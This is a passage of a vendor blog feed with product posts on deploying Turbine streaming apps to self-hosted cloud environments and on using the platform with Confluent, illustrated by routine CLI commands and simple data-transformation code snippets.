&lt;p&gt;On a final note, reducing the time it takes to build data solutions is crucial for businesses to stay agile and competitive in today&apos;s fast-paced environment. Meroxa&apos;s developer-led approach empowers developers to take charge, streamlining the process and enabling quicker conclusions to evolving business needs. By shifting focus from platform-led optimization of data-driven projects to developer-led discovery, companies can enable their big data projects to evolve with the needs of the business. In essence, Meroxa&apos;s developer-led paradigm has the potential to guarantee success for your big data project in a world that has forever suffered with an 85% failure rate.&lt;/p&gt;
&lt;p&gt;Don&apos;t let data volatility swamp your big data efforts. Don’t be part of the 85% failure rate of big data projects. To get in touch and see how Meroxa can help transform your data strategy, reach out to us by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:info@meroxa.com&quot;&gt;info@meroxa.com&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine + Self-Hosted Environments: Data Isolation For Streaming Apps]]></title><description><![CDATA[Choosing between speed and compliance is hard. Meroxa eliminates implementation complexity while still offering complete control of your data.]]></description><link>https://meroxa.com/blog/turbine-self-hosted-environments</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-self-hosted-environments</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 09 May 2023 13:32:05 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce Turbine support within Self-Hosted Environments. Software developers can now build and deploy Turbine data applications in Self Hosted Environments.&lt;/p&gt;
&lt;p&gt;We know that with the need for data security and compliance becoming more critical, teams often have to choose between speed (time to deploy) or compliance (minimizing risk with sensitive data). Data isolation is a critical component of any data streaming application, as it helps to ensure the accuracy and reliability of data processing while also enhancing data security. At Meroxa, we&apos;ve done the work to eliminate implementation complexity while still offering complete operational control over your data security, compliance, and performance needs.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Getting started with Environments&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;First, you&apos;ll need access to the Self-hosted Environments Beta to get started. Request access with the link below:
&lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme?__hstc=259081301.cdacee58365583db3016c560d11d6219.1655352845830.1682966540713.1683049264789.265&amp;#x26;__hssc=259081301.1.1683049264789&amp;#x26;__hsfp=3887566761&quot;&gt;Sign-up for the Self-hosted&lt;/a&gt;&lt;/strong&gt; &lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme?__hstc=259081301.cdacee58365583db3016c560d11d6219.1655352845830.1682966540713.1683049264789.265&amp;#x26;__hssc=259081301.1.1683049264789&amp;#x26;__hsfp=3887566761&quot;&gt;Environments&lt;/a&gt;&lt;/strong&gt; &lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme?__hstc=259081301.cdacee58365583db3016c560d11d6219.1655352845830.1682966540713.1683049264789.265&amp;#x26;__hssc=259081301.1.1683049264789&amp;#x26;__hsfp=3887566761&quot;&gt;Beta&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment. For more information on how to set up your Environment, refer to our &lt;a href=&quot;https://docs.meroxa.com/platform/environments/aws-self-hosted/setup&quot;&gt;setup documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Creating an Environment&lt;/h3&gt;
&lt;p&gt;You can provision a Self Hosted Environment through our dashboard in the &lt;strong&gt;Environments tab &gt; Create Environment&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-1316-PM.png&quot; alt=&quot;Turbine + Environments: Create a new environment&quot;&gt;&lt;/p&gt;
&lt;p&gt;Or through our &lt;strong&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;&lt;/strong&gt;. As part of the environment provisioning process, credentials from your cloud provider with the appropriate permissions are required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;env&lt;/span&gt; create my-env &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; selfhosted &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--provider&lt;/span&gt; aws &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--config&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;aws_access_key_id&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_ID&lt;/span&gt;&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;aws_secret_access_key&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$AWS_SECRET_KEY&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The Meroxa Platform will perform a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa platform for the control plane to ensure everything operates smoothly.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-22-1963-PM.png&quot; alt=&quot;Turbine + Environments: Environment summary&quot;&gt;&lt;/p&gt;
&lt;p&gt;Once successfully provisioned, you are ready to start creating Resources and build Turbine apps within your Self-hosted Environment.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Create a resource&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In order for a Turbine streaming application to securely connect with a data source or destination, one or more Meroxa Resources must be created. The resource must be added to the environment for it to be accessible. Resources created in the common environment will not be accessible in your environments.&lt;/p&gt;
&lt;p&gt;You can add a Meroxa resource via the dashboard under &lt;strong&gt;Resources tab &gt; Add Resource.&lt;/strong&gt; Under the environment dropdown, select the environment to create the resource in.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-4691-PM.png&quot; alt=&quot;Turbine + Environments: Add a resource&quot;&gt;&lt;/p&gt;
&lt;p&gt;You can also do this via our CLI.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;#&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;Create a resource&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create my-postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--env my-env
--url postgres://user:password@host.example.com:5432/db_name
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the ‘env’ tag in the CLI allows you to indicate which environment to create them in. The default environment is common.&lt;/p&gt;
&lt;p&gt;Once you’ve added your resources, you’re now ready to build your Turbine app! If you need help, check out our &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart&quot;&gt;Quickstart Guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Building a Turbine streaming application&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In the example below we will build a Turbine J application and deploy to our Environment. Other languages such as Python, Ruby, and Go are also supported. Initialize the streaming app within the local directory you are currently in by running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init myapp &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You may define a different local directory path for the app project by using --path /your/local/path/ in your command. A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app. Open your Turbine project and look for the app.rb file. This is where you will be writing your Turbine streaming application code. It should already contain a basic boilerplate like below to get started.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-8272-PM.png&quot; alt=&quot;Turbine + Environments: CLI&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the next section, we will deploy the example app to our environment.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Deploying a Turbine streaming application in a Self Hosted Environment&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Dashboard&lt;/a&gt; or CLI by running the meroxa resources list command --this command lists all resources and their state. If the resources don&apos;t exist, you must configure your resources using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Turbine framework uses git for version control. Upon initializing your application, git init is performed locally on your behalf. This creates a new repository in the project folder of your Turbine data app, which can be used to track your code. You will need to commit your code changes before deploying.&lt;/p&gt;
&lt;p&gt;Using the Meroxa CLI, run the meroxa app deploy command in the project folder root of your Turbine data app, this will start the process of deployment.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy &lt;span class=&quot;token parameter variable&quot;&gt;--env&lt;/span&gt; my-env&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the ‘env’ tag in the CLI allows you to indicate which environment to deploy your application, by default the application will be deployed to the Common Environment.&lt;/p&gt;
&lt;p&gt;The Meroxa CLI will print out the steps taken and confirm once deployment is successful. You can view your newly deployed application in the dashboard or via the CLI. For a more detailed walkthrough of deploying a Turbine application to an environment, refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Viewing your newly created application&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In the dashboard, you can view your newly created application in your environment under the Apps tab.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-20-8692-PM.png&quot; alt=&quot;Turbine + Environments: Dashboard&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the CLI, you can run the command below to list and view your applications.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;UUID         NAME        LANGUAGE   GIT SHA   STATE   ENVIRONMENT 
====== ================ ========== ========= ======= =============
8ed...     my-app       javascript   ad87... running    my-env &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;joining our Discord community server&lt;/a&gt;. We&apos;re excited to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Build Real-Time Data Apps Faster with Confluent + Meroxa]]></title><description><![CDATA[Learn how Meroxa's data platform can improve your time to value and enhance your experience when working with Confluent.]]></description><link>https://meroxa.com/blog/build-real-time-data-apps-faster-with-confluent-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/build-real-time-data-apps-faster-with-confluent-meroxa</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Thu, 27 Apr 2023 19:46:04 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s data-driven world, building and working with data products can be challenging. It requires profound technical knowledge and may even demand an infrastructure overhaul of existing systems. Meroxa’s code-first approach and infrastructure abstraction are key to effectively leveraging your existing infrastructure and engineering team. This can simplify complexity, promote efficiency, reusability, and customization.&lt;/p&gt;
&lt;p&gt;In this blog post, we will explore how Meroxa&apos;s data platform can enhance your experience when working with Confluent. By utilizing a code-first approach and infrastructure abstraction, we can significantly shorten your investment time from months to minutes and boost the value of your existing investment.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Code-first approach&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Taking a code-first approach allows data stakeholders to build upon their established knowledge and collective expertise. Meroxa&apos;s Turbine framework is designed with developers in mind, providing a rich local development experience that enables the best practices of software engineering processes and workflows. It allows unparalleled customizability and flexibility when working with Confluent, without the need for deep technical expertise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lower the bar to entry and fast start:&lt;/strong&gt; One of the main benefits of using Meroxa with Confluent Cloud is that it enables your existing teams to rapidly adopt Confluent and Kafka technologies without extensive training or external support. Meroxa simplifies the process of building stream processing applications. For example: (1) developers working with familiar languages and tooling, (2) simplifying the environment setup, (3) logging and monitoring can be implemented with the tool of your choice, (4) using a software workflow for building and testing the application eliminates needing to develop your own. This allows the focus to be working with the data rather than on the underlying complexities of your data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Leverage your existing SDLC workflow and tooling:&lt;/strong&gt; Meroxa enables you to leverage your existing Software Development Life Cycle (SDLC) workflow and tooling while offering ease of scalability, multiple environments, Git support, CI/CD integrations etc. Meroxa developer workflows that have been refined over years through software engineering best practices, provide tooling and support often missing in today&apos;s data projects. With Meroxa you can establish enterprise-wide best practices with Confluent. This increases collaboration and efficiency while maintaining the flexibility and customizability necessary for success in data engineering tasks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Choose any language:&lt;/strong&gt; Developers can create stream processing applications and pipelines using their programming language of choice (Python, Go Lang, Javascript, Ruby, etc.), while taking advantage of existing libraries and packages within those languages. By empowering developers with familiar languages and tools, a code-first approach fosters efficiency, reusability, and customization, maximizing the potential of the developer team and saving time and resources.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Infrastructure Abstraction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Infrastructure abstraction is a key feature of the Meroxa Data Platform, streamlining complex data technologies and making them more accessible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No rip and replace; sits alongside your existing infrastructure:&lt;/strong&gt; Typically, integrating new data tooling can be disruptive and costly as it requires the development team to re-engineer their data processing pipelines, to learn new programming paradigms, and to adjust their monitoring and management practices. Meroxa sits seamlessly integrates with all your current systems. The resource catalog abstracts the complexities and idiosyncrasies of the supported resource types and presents a simple, unified way to consume data from and/or push data to the resource via a common name.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Allows your team to focus on driving business value:&lt;/strong&gt; By adopting a code-first approach, Meroxa simplifies the connection process to various resources, supporting the connection of Confluent streams to any destination and vice versa. This freedom of connectors and rapid development capabilities enable developers to deploy fully functioning, production-grade data products from what was months before to minutes. Once resources have been onboarded, they are made available for use via friendly names, with unnecessary implementation details such as connection strings, authentication mechanisms, connector configurations, data formats, and connectivity details abstracted away. This lowers the barriers to entry for building data streams, allowing any data stakeholders to efficiently utilize the data, without the complexities of the given resource.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automates the operation of the underlying infrastructure:&lt;/strong&gt; Meroxa automates the management of underlying infrastructure, making it easier for developers to focus on their core tasks. Meroxa provides end-to-end automation, handling everything from packaging user-defined custom code to deploying it any cloud or on-prem. Meroxa provisions and configures the required connectors, integrates them with the custom code to create a seamless system. As traffic patterns fluctuate, the platform intelligently scales function nodes to accommodate changes in demand. Furthermore, Meroxa&apos;s self-healing capabilities ensure that any issues with components are promptly addressed, maintaining the stability and reliability of the system.&lt;/p&gt;
&lt;h2&gt;Meroxa + Confluent = More Value, Less Investment and Months to Minutes&lt;/h2&gt;
&lt;p&gt;Confluent provides a framework for data in motion, and the partnership with Meroxa helps engage business developers with self-service capabilities that boosts the value of the solution and potentially greatly reduces the investment time from months to minutes. Please see the illustration below. Meroxa’s approach generates greater value for Confluent clients with much less investment in much less time.&lt;/p&gt;
&lt;p&gt;Confluent Cloud and Meroxa users do not have to deploy and manage the infrastructure for the stream processing application, allowing developers to build faster pipelines, without having to first solve infrastructure complexities. Meroxa offers a native integration into Confluent Cloud, not just self-hosted Kafka, allowing any data stakeholder to work effortlessly with Confluent Cloud.&lt;/p&gt;
&lt;p&gt;Additionally, Meroxa enables streaming data into Confluent from any source, sending data from Confluent to any destination, and working with Confluent data in any format.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confluent time to value curve&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://www.confluent.io/blog/data-in-motion-with-confluent-and-apache-kafka/&quot;&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Confluent%20Value%20Curve%20Image.png&quot; alt=&quot;Confluent Value Curve Image&quot;&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confluent time to value accelerates with Meroxa&lt;/strong&gt;**&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Confluent%20+%20Meroxa%20Time%20to%20Value%20Curve.png&quot; alt=&quot;Confluent + Meroxa Time to Value Curve&quot;&gt;**&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Simple pipeline builds&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa enables developers to quickly iterate and build simple pipelines by providing a rich local development experience allowing developers of any skill level to test out their hypotheses on data projects, reducing the complexity of working with data.&lt;/p&gt;
&lt;p&gt;By allowing users to &quot;sample&quot; Confluent Streams, developers can rapidly local test on new data before committing to larger initiatives. This approach enables organizations to conclude faster on which projects to invest time and resources into, essentially allowing them to test before investing at speed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easy Pipelining&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Meroxa brings software engineering best practices such as native support for Git and collaboration tools, allowing organizations to extend their software development processes and workflows to encapsulate data engineering.&lt;/p&gt;
&lt;p&gt;Moreover, users can integrate packages and custom code modules, allowing for simple reuse of code within the organization and use of external 3rd party modules. By providing these features, Meroxa enables Confluent users to increase collaboration and efficiency, while maintaining the flexibility and customizability necessary for success in data engineering tasks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Platform Effects&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Meroxa enables Confluent users to reuse tested and proven departmental pipelines at an enterprise-wide level, follow enterprise-wide best practices, and benefit from CI/CD integrations and consolidated monitoring of pipelines. The platform also offers ease of scalability and multiple environments (development, testing, staging, and production) that are designed to serve specific purposes.&lt;/p&gt;
&lt;h2&gt;E&lt;strong&gt;nriching real time data streams without Meroxa Turbine&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To enrich real time data in Confluent without Meroxa would require Kafka Streams or ksqlDB to implement your stream processing logic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kafka Streams:&lt;/strong&gt; With Kafka streams, you would typically write a Java or Scala application using the Kafka Streams library. In your application, you would define your processing logic, for example: joining the source topic with other topics containing enrichment data, or filtering and aggregating the data. Additionally, you need to deploy the application to a suitable environment, and once it&apos;s deployed, you must set up logging and monitoring as well. Furthermore, you would also need to establish a workflow for building and testing the application.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ksqlDB:&lt;/strong&gt; With ksqlDB, you would write a series of ksqlDB statements to define your stream-processing logic. This includes creating streams and tables, performing joins between streams and tables, filtering, and aggregating data.&lt;/p&gt;
&lt;p&gt;Using Kafka Streams or ksqlDB for enriching real-time data streams can present challenges, depending on your use case and team expertise:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Steep Learning curve&lt;/strong&gt;: Both Kafka Streams and ksqlDB have a steep learning curve, especially for those who are new to Kafka and stream-processing concepts. Developers need to familiarize themselves with the libraries and APIs, as well as the concepts of stream processing, such as windowing and stateful processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Language limitations&lt;/strong&gt;: Kafka Streams only allows applications to be written in Java or Scala, which may not be ideal for teams with expertise in other programming languages. While ksqlDB offers a more accessible SQL-like language, it may still require some knowledge of the ksqlDB-specific syntax and features. Moreover, there are limitations to using SQL, as certain tasks cannot be accomplished using this language alone. For example, if you need to interact with a third-party API for data enrichment, or import a specific package to perform image manipulation, SQL would not be sufficient. In such cases, developers must resort to alternative approaches to address these complex requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complexity&lt;/strong&gt;: Implementing stream-processing logic using Kafka Streams or ksqlDB can be complex, particularly when dealing with stateful processing, joins, and windowing operations. This complexity may lead to a longer development cycle and increased potential for errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and performance&lt;/strong&gt;: Ensuring that your Kafka Streams applications or ksqlDB queries scale well and perform efficiently may require additional expertise in tuning and optimizing Kafka and the underlying infrastructure.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Enrich real time data streams with Meroxa Turbine&lt;/h3&gt;
&lt;p&gt;To enrich real-time data using Meroxa’s Turbine framework is simpler. You would simply connect your data streams and implement processing logic in the language of your choice. When implementing the processing logic, you can leverage libraries, packages and APIs you are already familiar with and that have been rigorously tested by millions of software developers.&lt;/p&gt;
&lt;p&gt;Here’s a simple example of enriching a data stream using Turbine &lt;code class=&quot;language-text&quot;&gt;JavaScript&lt;/code&gt; where we convert temperature values from Celsius to Fahrenheit in a stream of weather data:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token function&quot;&gt;processDataStream&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Use record `get` and `set` to read and write to your data&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;temperature_celsius&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;undefined&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; temperatureFahrenheit &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;32&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;temperature_fahrenheit&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; temperatureFahrenheit&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is another example of enriching a data stream using Turbine &lt;code class=&quot;language-text&quot;&gt;Python&lt;/code&gt; using the &lt;code class=&quot;language-text&quot;&gt;datetime&lt;/code&gt; package, where we prepend a timestamp to each line of a log file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; datetime

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;prepend_timestamp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
